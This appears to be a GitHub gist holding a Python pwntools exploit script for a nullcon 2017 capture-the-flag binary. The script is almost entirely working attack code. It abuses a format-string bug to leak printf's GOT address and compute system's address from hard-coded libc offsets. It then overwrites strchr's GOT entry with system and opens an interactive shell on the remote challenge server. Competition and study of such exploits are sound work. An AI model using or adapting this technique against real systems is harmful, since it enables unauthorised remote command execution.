Skip to content

Instantly share code, notes, and snippets.

@rverton
Created March 26, 2017 11:46

Revisions

  1. rverton created this gist Mar 26, 2017.
    46 changes: 46 additions & 0 deletions level1-pwn.py
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,46 @@
    #!/usr/bin/python

    # exploit for level1.bin (nullcon 2017)

    from pwn import *

    def add_book(p):
    p.sendline('1')
    p.recvuntil('Enter book name: ')
    p.sendline('a')
    p.recvuntil('Enter book id: ')
    p.sendline('1')

    def leak_addr(p, addr):
    p.sendline('3')
    p.recvuntil('Enter query: ')
    leak_fmt_str = p32(addr) + "%11$s"
    p.sendline(leak_fmt_str)
    result = p.recvline().strip()
    return u32(result[20:24])

    if __name__ == '__main__':
    #p = process('./level1.bin', stdin=process.PTY)
    p = remote('34.198.96.6', 9001)
    p.recvuntil('Enter choice: ')

    add_book(p)

    p.recvuntil('Enter choice: ')

    printf = leak_addr(p, 0x804b014)
    printf_offset = 0x0004cdd0
    system_offset = 0x0003fe70
    system = printf - printf_offset + system_offset
    strchr_got = 0x804b030

    log.info("printf @ %#x" % printf)
    log.info("system @ %#x" % system)

    payload = "/bin/sh # "
    payload += fmtstr_payload(14, {strchr_got: system}, numbwritten=12)

    p.sendline('3')
    p.recvuntil('Enter query: ')
    p.sendline(payload)
    p.interactive()